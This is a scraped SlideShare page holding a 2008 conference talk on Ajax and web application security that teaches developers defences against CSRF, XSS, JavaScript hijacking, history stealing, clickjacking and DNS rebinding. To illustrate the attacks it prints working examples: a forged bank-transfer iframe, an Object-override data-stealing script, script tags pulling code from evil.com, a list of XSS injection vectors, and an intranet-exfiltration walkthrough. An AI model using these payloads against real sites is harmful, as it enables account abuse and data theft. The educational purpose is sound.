0
Ajax Security
              Keeping your application safe
                      Joe Walker




Copyright SitePen, Inc. 200...
89 out of 10 Websites
             have serious vulnerabilities



Copyright SitePen, Inc. 2008. All Rights Reserved
Goal: Keep the bad guys
                      out of your website



Copyright SitePen, Inc. 2008. All Rights Reserved
The Attackers




       Who is the attacker?
        • Troublemakers / Thieves
       Who is the victim?
        • Your d...
Agenda

                                                    CSRF, Login CSRF
                                             ...
CSRF
(Cross Site Request Forgery)

You can still abuse someone else’s cookies
and headers even if you can’t read them
Recap: Cross-Domain Rules


                           www.bank.com                   www.evil.com

       c = document.co...
Abusing a Cookie without reading it

                           www.bank.com                       www.evil.com



       ...
CSRF

       JavaScript is not always required to exploit a CSRF hole

       Often all you need is:
              • <ifra...
CSRF

       CSRF attacks are write-only (with one exception)

       Both GET and POST can be forged

       Referrer che...
CSRF - Protection

                                                    Not 100%
                                          ...
CSRF - Protection

       Security tokens in GET requests are not a great idea
          (bookmarks, caches, GET is idempo...
Login CSRF
(Tricking someone into thinking they are you)



CSRF turned inside out
Login CSRF



       If I can make your browser do things behind your back,
       how about logging you out of some servi...
Login CSRF - Attacks



       What can I do?
        • See what you search for
        • See what books you want to buy
 ...
Login CSRF - Defense



       If submitting over https: use Referrer checking
          • Do not assume no referrer is sa...
JavaScript
    Hijacking
  (or how your GMail
 contacts were at risk)



Sucking data out of Objects before
they’re created
JavaScript Hijacking



       “CSRF is write-only with one known exception”

       Using <script> automatically evaluate...
<script type=quot;text/javascriptquot;>
            function Object() {
              alert(quot;Hello, Worldquot;);
     ...
<script type=quot;text/javascriptquot;>
            function Object() {
              this.__defineSetter__('wibble', func...
<script type=quot;text/javascriptquot;>
            var obj;
            function Object() {
              obj = this;
   ...
JavaScript Hijacking



                             When you serve JavaScript from a website it
                         ...
JavaScript Hijacking



       Sometimes people wish to have a double layer of
       security to prevent evaluation:
    ...
XSS (Cross Site Scripting)

Abusing someone’s trust in your typing
Copyright SitePen, Inc. 2008. All Rights Reserved
XSS



       2 types:
         • Reflected: Script embedded in the request is
           ‘reflected’ in the response
      ...
XSS

       Scenario: You let the user enter their name

       Someone is going to enter their name like this:
          ...
XSS - Making User Input Safe




       So, you filter out ‘<script.*>’ and then you’re safe.
       Right?




Copyright S...
XSS - Places that scripts get eval()ed
       1. <table
                       background=quot;javascript:danger()quot;>  ...
XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually...
XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually...
XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually...
XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually...
XSS - Making User Input Safe


       And we haven’t got into:
         • Flash (ActionScript ~= JavaScript)
         • SV...
XSS - The Heart of the Problem




                                “Be conservative in what you do; be
                   ...
XSS - The Heart of the Problem



                            In                      +       A   Out



                 ...
The web developers get lazy ...
Copyright SitePen, Inc. 2008. All Rights Reserved
The browser fixes the problems ...




Copyright SitePen, Inc. 2008. All Rights Reserved
The users like
    the new
   browser ...




Copyright SitePen, Inc. 2008. All Rights Reserved
The web
developers
get even
lazier ...




Copyright SitePen, Inc. 2008. All Rights Reserved
The browser fixes the problems ...




Copyright SitePen, Inc. 2008. All Rights Reserved
The users like the
                                                    new browser even
                                  ...
XSS - The Heart of the Problem



                  ¼STYLE¾@import'javas
                  cri

                  pt:dange...
XSS - Protection (HTML is Illegal)

       1. Filter inputs by white-listing input characters
         • Remember to filter...
XSS - Protection (well-formed HTML is legal)

                  1. Filter inputs as before
                  2. Validate a...
XSS - Protection (malformed HTML is legal)



                  1. Find another way to do it / Swap jobs / Find
          ...
There is NO WAY to protect
            against some injection points



Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Injection Points

       Places you can protect:
         • Plain content
           <div>$</div>
         • Some at...
XSS - Injection Points

       Places you can’t easily protect:
          • <script>$</script>
          • <div $>
       ...
XSS Tricks:
                                    Comment Power-up



Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Comment Power-up



       Commonly reflected attacks have length restrictions

       How to create space for an inj...
XSS - Summary

       For data input:
              • Restrict allowed characters for destination type

       For data ou...
History Stealing



I know where you’ve been, parts 1, 2, 3
History Stealing - Part 1


       Mr. Evil wants to know if you visit bank.com

       He creates a page with a link and
...
History Stealing - Part 2




       2 methods of detecting link color:
         • Easy - use JavaScript to read CSS prope...
History Stealing - Part 2



       Point a script tag at a protected HTML resource, detect
       differing replies by di...
History Stealing - Part 3

       A page can quickly check thousands of sites and find
       where you bank and store your...
Combination Attacks
Small holes don’t add up, they
multiply up
Web Worms

       If your site that isn’t 100% safe against XSS and CSRF, users
       can attack their ‘friends’ with scr...
Intranet Hacking



       History stealing to enumerate hosts inside the firewall
       Anti-DNS pinning to read HTML fro...
Clickjacking



When the page you are looking at is not
the page you think you are looking at
Clickjacking - Protection




                  if (window.top != window) {
                    document.body.style.displa...
ADP = Anti DNS Pinning



Moving intranet servers into your
domain
Anti-DNS Pinning

                                                    DNS for evil.com


                                 ...
Anti-DNS Pinning

                                                                  DNS for evil.com


                   ...
Anti-DNS Pinning

                                                    DNS for evil.com

              What’s the IP addres...
Anti-DNS Pinning

                                                    DNS for evil.com
                              You n...
Anti-DNS Pinning

                                                                       DNS for evil.com


              ...
Anti-DNS Pinning
                                    HTML +
                                                    DNS for ev...
Anti-DNS Pinning

                                                                  DNS for evil.com


                   ...
Anti-DNS Pinning

                                                    DNS for evil.com

              What’s the IP addres...
Anti-DNS Pinning

                                                    DNS for evil.com

                         You need ...
Anti-DNS Pinning

                                                                    DNS for evil.com


                 ...
Anti-DNS Pinning

                                                                       DNS for evil.com


              ...
Anti-DNS Pinning

                  Outer frame reads                 DNS for evil.com
                    text from inner...
Anti-DNS Pinning


       About ‘Pinning’:
       Browsers ‘pin’ addresses to stop short timeouts
       DNS round-robin f...
Anti-DNS Pinning

       It’s not great for the Internet:

       The browser thinks the domain is evil.com, so cookies
  ...
Questions?

                                        Joe Walker
                   http://sitepen.com
        http://direct...
Web 2.0 Hacking



Everything has a down side
Web 2.0 Hacking

       Building blocks:
        • Google Alerts: Search to EMail
        • Mailinator: EMail to RSS
     ...
More Information



Copyright SitePen, Inc. 2008. All Rights Reserved
Dropping SSL after login is dangerous


       Being able to snoop on someone else’s cookie is
       virtually the same a...
Useful Tools

       Firefox:
          • NoScript - Accept scripts only from sites you trust
          • AltCookies - Acc...
Upcoming SlideShare
Loading in...5
×

Ajax Security

30,448

Published on

A talk from the Ajax Experience

Published in: Technology
5 Comments
69 Likes
Statistics
Notes
No Downloads
Views
Total Views
30,448
On Slideshare
0
From Embeds
0
Number of Embeds
12
Actions
Shares
0
Downloads
2,565
Comments
5
Likes
69
Embeds 0
No embeds

No notes for slide

Transcript of "Ajax Security"

  1. 1. Ajax Security Keeping your application safe Joe Walker Copyright SitePen, Inc. 2008. All Rights Reserved
  2. 2. 89 out of 10 Websites have serious vulnerabilities Copyright SitePen, Inc. 2008. All Rights Reserved
  3. 3. Goal: Keep the bad guys out of your website Copyright SitePen, Inc. 2008. All Rights Reserved
  4. 4. The Attackers Who is the attacker? • Troublemakers / Thieves Who is the victim? • Your data / Your users / Your partners Copyright SitePen, Inc. 2008. All Rights Reserved
  5. 5. Agenda CSRF, Login CSRF JavaScript Hijacking XSS History Stealing Combination Attacks Session Fixation + ADP + Clickjacking Copyright SitePen, Inc. 2008. All Rights Reserved
  6. 6. CSRF (Cross Site Request Forgery) You can still abuse someone else’s cookies and headers even if you can’t read them
  7. 7. Recap: Cross-Domain Rules www.bank.com www.evil.com c = document.cookie; c = document.cookie; alert(c); alert(c); /* /* Shows cookies from Shows cookies from www.bank.com www.evil.com */ */ Copyright SitePen, Inc. 2008. All Rights Reserved
  8. 8. Abusing a Cookie without reading it www.bank.com www.evil.com Welcome to Bank.com Welcome to Evil.com We offer the best rates anywhere in We’ve got lots of warez to give away the world, guaranteed. Give us your for freee. Download our stuffs and money and we will look after it in then come back and get more the same way we look after little stuffs. Videoz, Warez, Codez, Mp3s baby kittens. . <iframe width=0 height=0 src=quot;http://bank.com/transfer?amnt=all&dest=MrEvilquot;/> Copyright SitePen, Inc. 2008. All Rights Reserved
  9. 9. CSRF JavaScript is not always required to exploit a CSRF hole Often all you need is: • <iframe src=quot;dangerous_urlquot;> • or <img src=quot;dangerous_urlquot;/> • or <script src=quot;dangerous_urlquot;> You can’t use XHR because cross-domain rules prevent the request from being sent Copyright SitePen, Inc. 2008. All Rights Reserved
  10. 10. CSRF CSRF attacks are write-only (with one exception) Both GET and POST can be forged Referrer checking is not a complete fix It’s not just cookies that get stolen: • HTTP-Auth headers • Active Directory Kerberos tokens Copyright SitePen, Inc. 2008. All Rights Reserved
  11. 11. CSRF - Protection Not 100% solution Force users to log off Check referrer headers (https only) Include authentication tokens The only complete in the body of EVERY request solution Copyright SitePen, Inc. 2008. All Rights Reserved
  12. 12. CSRF - Protection Security tokens in GET requests are not a great idea (bookmarks, caches, GET is idempotent etc) POST means forms with hidden fields • OWASP servlet filter http://www.owasp.org/index.php/CSRF_Guard Double-submit cookie pattern (Ajax requests only) • Read the cookie with Javascript and submit in the body Copyright SitePen, Inc. 2008. All Rights Reserved
  13. 13. Login CSRF (Tricking someone into thinking they are you) CSRF turned inside out
  14. 14. Login CSRF If I can make your browser do things behind your back, how about logging you out of some service and back in as me. What are the possibilities when you think that you are you, but you’re not; you’re me? Copyright SitePen, Inc. 2008. All Rights Reserved
  15. 15. Login CSRF - Attacks What can I do? • See what you search for • See what books you want to buy • Read emails that you send • Steal credit card details through PayPal • etc Copyright SitePen, Inc. 2008. All Rights Reserved
  16. 16. Login CSRF - Defense If submitting over https: use Referrer checking • Do not assume no referrer is safe Use authentication tokens in your login form Watch out for session fixation attacks • Invalidate the server session on login and re-create it Copyright SitePen, Inc. 2008. All Rights Reserved
  17. 17. JavaScript Hijacking (or how your GMail contacts were at risk) Sucking data out of Objects before they’re created
  18. 18. JavaScript Hijacking “CSRF is write-only with one known exception” Using <script> automatically evaluates the returned script So if you can just find a way to intercept scripts as they are evaluated ... Copyright SitePen, Inc. 2008. All Rights Reserved
  19. 19. <script type=quot;text/javascriptquot;> function Object() { alert(quot;Hello, Worldquot;); } var x = {}; </script> Copyright SitePen, Inc. 2008. All Rights Reserved
  20. 20. <script type=quot;text/javascriptquot;> function Object() { this.__defineSetter__('wibble', function(x) { alert(x); }); } var x = {}; x.wibble = quot;Hello, Worldquot;; </script> Copyright SitePen, Inc. 2008. All Rights Reserved
  21. 21. <script type=quot;text/javascriptquot;> var obj; function Object() { obj = this; this.__defineSetter__('killme', function(x) { for (key in obj) { if (key != 'killme') { alert('Stolen: ' + key + '=' + obj[key]); } } }); setTimeout(quot;obj['killme']='ignored';quot;, 0); } </script> <script src=quot;http://example.com/data-service/quot;> Copyright SitePen, Inc. 2008. All Rights Reserved
  22. 22. JavaScript Hijacking When you serve JavaScript from a website it could be evaluated in a hostile environment Protect secrets in JavaScript in the same way that you would protect them elsewhere Copyright SitePen, Inc. 2008. All Rights Reserved
  23. 23. JavaScript Hijacking Sometimes people wish to have a double layer of security to prevent evaluation: /*<JSON_HERE>*/ (Don’t do this) while(true); <JSON_HERE> (Google) throw new Error(quot;quot;); <JSON_HERE> (DWR) {}&& <JSON_HERE> Copyright SitePen, Inc. 2008. All Rights Reserved
  24. 24. XSS (Cross Site Scripting) Abusing someone’s trust in your typing
  25. 25. Copyright SitePen, Inc. 2008. All Rights Reserved
  26. 26. XSS 2 types: • Reflected: Script embedded in the request is ‘reflected’ in the response • Stored: Attacker’s input is stored and played back in later page views Copyright SitePen, Inc. 2008. All Rights Reserved
  27. 27. XSS Scenario: You let the user enter their name Someone is going to enter their name like this: Joe<script src=quot;http://evil.com/danger.jsquot;> Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe Generally HTML is not a valid input, but sometimes it is: • Blogs, MySpace, Wikis, RSS readers, etc Copyright SitePen, Inc. 2008. All Rights Reserved
  28. 28. XSS - Making User Input Safe So, you filter out ‘<script.*>’ and then you’re safe. Right? Copyright SitePen, Inc. 2008. All Rights Reserved
  29. 29. XSS - Places that scripts get eval()ed 1. <table background=quot;javascript:danger()quot;> 14.<body background=quot;javascript:danger()quot;> 2. <input type='image' src='javascript:danger()'/> 15.<div onscroll='danger()'> 3. <object type=quot;text/x-scriptletquot; 16.<div onmouseenter='danger()'> data=quot;evil.com/danger.jsquot;> 17.<style> 4. <img src='javascript:danger()'/> @import evil.com/danger.js</style> 5. <frameset> 18.<style>BODY{-moz-binding:url( <frame src=quot;javascript:danger()quot;> quot;http://evil.com/danger.js#xssquot; )}</style> 6. <link rel=quot;stylesheetquot; href=quot;javascript:danger()quot;/> 19.<xss style=quot;behavior:url(danger.htc);quot;> 7. <base href=quot;javascript:danger()quot;> 20.<div style=quot;background-image: 8. <meta http-equiv=quot;refreshquot; url(javascript:danger())quot;> content=quot;0;url=javascript:danger()quot;> 21.<div style=quot;width: 9. <p style='background-image: expression(danger());quot;> url(quot;javascript:danger()quot;)'); 22.<xss style=quot;xss:expression(danger())quot;> 10.<a href='javascript:danger()'> 11.<tr background=quot;javascript:danger()quot;> Many more 12.<body onload='danger()'> http://ha.ckers.org/xss.html 13.<div onmouseover='danger()'> Copyright SitePen, Inc. 2008. All Rights Reserved
  30. 30. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.htmlquot; link</a> makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  31. 31. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.htmlquot;>link makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  32. 32. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.html >link</a> makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  33. 33. XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: (depending on some encoding tricks) ¼a href=quot;a.htmlquot;¾link¼/a¾ makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
  34. 34. XSS - Making User Input Safe And we haven’t got into: • Flash (ActionScript ~= JavaScript) • SVG (can embed JavaScript) • XML Data Islands (IE only) • HTML+TIME You can use both <object> and <embed> for many of these Copyright SitePen, Inc. 2008. All Rights Reserved
  35. 35. XSS - The Heart of the Problem “Be conservative in what you do; be liberal in what you accept from others” Postel’s Law Copyright SitePen, Inc. 2008. All Rights Reserved
  36. 36. XSS - The Heart of the Problem In + A Out B Copyright SitePen, Inc. 2008. All Rights Reserved
  37. 37. The web developers get lazy ... Copyright SitePen, Inc. 2008. All Rights Reserved
  38. 38. The browser fixes the problems ... Copyright SitePen, Inc. 2008. All Rights Reserved
  39. 39. The users like the new browser ... Copyright SitePen, Inc. 2008. All Rights Reserved
  40. 40. The web developers get even lazier ... Copyright SitePen, Inc. 2008. All Rights Reserved
  41. 41. The browser fixes the problems ... Copyright SitePen, Inc. 2008. All Rights Reserved
  42. 42. The users like the new browser even more ... Copyright SitePen, Inc. 2008. All Rights Reserved
  43. 43. XSS - The Heart of the Problem ¼STYLE¾@import'javas cri pt:danger()';¼/STYLE¾ Copyright SitePen, Inc. 2008. All Rights Reserved
  44. 44. XSS - Protection (HTML is Illegal) 1. Filter inputs by white-listing input characters • Remember to filter header names and values 2. Filter outputs for the destination environment For HTML: < &lt; > &gt; ' &apos; quot; &quot; & &amp; For JavaScript Strings (but see later): ' ' quot; quot; LF n CR r * uXXXX Other environments have other special chars Copyright SitePen, Inc. 2008. All Rights Reserved
  45. 45. XSS - Protection (well-formed HTML is legal) 1. Filter inputs as before 2. Validate as HTML and throw away if it fails 3. Swap characters for entities (as before) 4. Swap back whitelist of allowed tags. e.g.: • &lt;strong&gt; <strong> 5. Take extra care over attributes: • &lta href=&quot;([^&]*)&quot;/&gt; <a href=quot;$1quot;/> 6. Take great care over regular expressions Copyright SitePen, Inc. 2008. All Rights Reserved
  46. 46. XSS - Protection (malformed HTML is legal) 1. Find another way to do it / Swap jobs / Find some other solution to the problem 2. Create a tag soup parser to create a DOM tree from a badly formed HTML document • Remember to recursively check encodings 3. Create a tree walker that removes all non approved elements and attributes Copyright SitePen, Inc. 2008. All Rights Reserved
  47. 47. There is NO WAY to protect against some injection points Copyright SitePen, Inc. 2008. All Rights Reserved
  48. 48. XSS - Injection Points Places you can protect: • Plain content <div>$</div> • Some attribute values <input name=x value=quot;$quot;> (but take care) • Javascript string values: <script>str = quot;$quot;;</script> (but take care) Anything else is likely to be unsafe Copyright SitePen, Inc. 2008. All Rights Reserved
  49. 49. XSS - Injection Points Places you can’t easily protect: • <script>$</script> • <div $> • <div style=quot;$quot;>... • <div background=quot;$quot;> • <img src=quot;$quot;> • etc If users can affect CSS values, hrefs, srcs or plain JavaScript then you are likely to have an XSS hole Copyright SitePen, Inc. 2008. All Rights Reserved
  50. 50. XSS Tricks: Comment Power-up Copyright SitePen, Inc. 2008. All Rights Reserved
  51. 51. XSS - Comment Power-up Commonly reflected attacks have length restrictions How to create space for an injection attack • Use ‘<script>/*’ in an restricted unprotected field and ‘*/’ in a later unrestricted protected field Copyright SitePen, Inc. 2008. All Rights Reserved
  52. 52. XSS - Summary For data input: • Restrict allowed characters for destination type For data output: • Escaped for the destination environment • Ensure encoding is specified (e.g. UTF-8) Allow inject only into known safe points Never assume that a hole is too small to jump through Copyright SitePen, Inc. 2008. All Rights Reserved
  53. 53. History Stealing I know where you’ve been, parts 1, 2, 3
  54. 54. History Stealing - Part 1 Mr. Evil wants to know if you visit bank.com He creates a page with a link and uses a script to read the CSS link color: • purple: customer • blue: not a customer Copyright SitePen, Inc. 2008. All Rights Reserved
  55. 55. History Stealing - Part 2 2 methods of detecting link color: • Easy - use JavaScript to read CSS properties • When JS is turned off - use CSS to ping the server Copyright SitePen, Inc. 2008. All Rights Reserved
  56. 56. History Stealing - Part 2 Point a script tag at a protected HTML resource, detect differing replies by differing error messages <script src=quot;http://mail.google.com/mailquot;> http://ha.ckers.org/weird/javascript-website-login-checker.html Copyright SitePen, Inc. 2008. All Rights Reserved
  57. 57. History Stealing - Part 3 A page can quickly check thousands of sites and find where you bank and store your email A page can follow your clicks around the net: • Check for common set of URLs • Page reports hits to server • Server reads hit pages, greps out links sends links back • Page checks and follows a click-stream Copyright SitePen, Inc. 2008. All Rights Reserved
  58. 58. Combination Attacks Small holes don’t add up, they multiply up
  59. 59. Web Worms If your site that isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts XHR/Flash/Quicktime can be used as a vector Web worms grow much faster than email worms So far, infections have been mostly benign, like how email worms were in the early 90’s ... http://www.whitehatsec.com/downloads/WHXSSThreats.pdf Copyright SitePen, Inc. 2008. All Rights Reserved
  60. 60. Intranet Hacking History stealing to enumerate hosts inside the firewall Anti-DNS pinning to read HTML from inside Many routers / firewalls / etc have default passwords, which an attacker can exploit Use CSRF to alter router / firewall settings http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf Copyright SitePen, Inc. 2008. All Rights Reserved
  61. 61. Clickjacking When the page you are looking at is not the page you think you are looking at
  62. 62. Clickjacking - Protection if (window.top != window) { document.body.style.display = quot;nonequot;; } Copyright SitePen, Inc. 2008. All Rights Reserved
  63. 63. ADP = Anti DNS Pinning Moving intranet servers into your domain
  64. 64. Anti-DNS Pinning DNS for evil.com 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  65. 65. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Let’s visit evil.com 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  66. 66. Anti-DNS Pinning DNS for evil.com What’s the IP address for evil.com? 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  67. 67. Anti-DNS Pinning DNS for evil.com You need 1.2.3.4 (timeout = 1 sec) 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  68. 68. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Can I have http://evil.com? 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  69. 69. Anti-DNS Pinning HTML + DNS for evil.com JavaScript that creates an iframe 2 seconds after 1.2.3.4 the page has loaded 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  70. 70. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Time passes (2 seconds) 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  71. 71. Anti-DNS Pinning DNS for evil.com What’s the IP address for evil.com? 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  72. 72. Anti-DNS Pinning DNS for evil.com You need 10.0.0.1 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  73. 73. Anti-DNS Pinning DNS for evil.com 1.2.3.4 Can I have 10.0.0.1 http://evil.com/blah? Copyright SitePen, Inc. 2008. All Rights Reserved
  74. 74. Anti-DNS Pinning DNS for evil.com 1.2.3.4 This web server is really http://intranet.corp.com 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  75. 75. Anti-DNS Pinning Outer frame reads DNS for evil.com text from inner iframe and sends it back to 1.2.3.4 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  76. 76. Anti-DNS Pinning About ‘Pinning’: Browsers ‘pin’ addresses to stop short timeouts DNS round-robin forces re-query of DNS if website appears to be down So websites can get around pins by firewalling themselves thus appearing to be down Copyright SitePen, Inc. 2008. All Rights Reserved
  77. 77. Anti-DNS Pinning It’s not great for the Internet: The browser thinks the domain is evil.com, so cookies for innocent.com are not sent: Cookie protected resources are safe (for now) But it’s great for Intranet hacking No cookies needed to read from 192.168.0.1 or 127.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
  78. 78. Questions? Joe Walker http://sitepen.com http://directwebremoting.org/blog/joe Copyright SitePen, Inc. 2008. All Rights Reserved
  79. 79. Web 2.0 Hacking Everything has a down side
  80. 80. Web 2.0 Hacking Building blocks: • Google Alerts: Search to EMail • Mailinator: EMail to RSS • Ponyfish: Web to RSS via scraping • Storage: DabbleDB, Zoho • Yahoo Pipes: RSS remixing • L8R: Cron for EMail • Google Mashup Editor: RSS to REST API • Dapper, OpenKappow Copyright SitePen, Inc. 2008. All Rights Reserved
  81. 81. More Information Copyright SitePen, Inc. 2008. All Rights Reserved
  82. 82. Dropping SSL after login is dangerous Being able to snoop on someone else’s cookie is virtually the same as being able to snoop on their password Some services (e.g. Google) default to http after login (bad), but allow you to use https for the whole session: • https://mail.google.com/mail/ • https://www.google.com/calendar/ • etc. Copyright SitePen, Inc. 2008. All Rights Reserved
  83. 83. Useful Tools Firefox: • NoScript - Accept scripts only from sites you trust • AltCookies - Accept cookies only from sites you trust • EditCooikes - Alter cookies for testing • Firebug - Dig deeply into HTTP/JavaSript/CSS and HTTP General: • Paros - Filtering Proxy (can be configured to be transparent) • Burp - Like Paros • Fiddler - Like Paros with integration into IE Copyright SitePen, Inc. 2008. All Rights Reserved
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×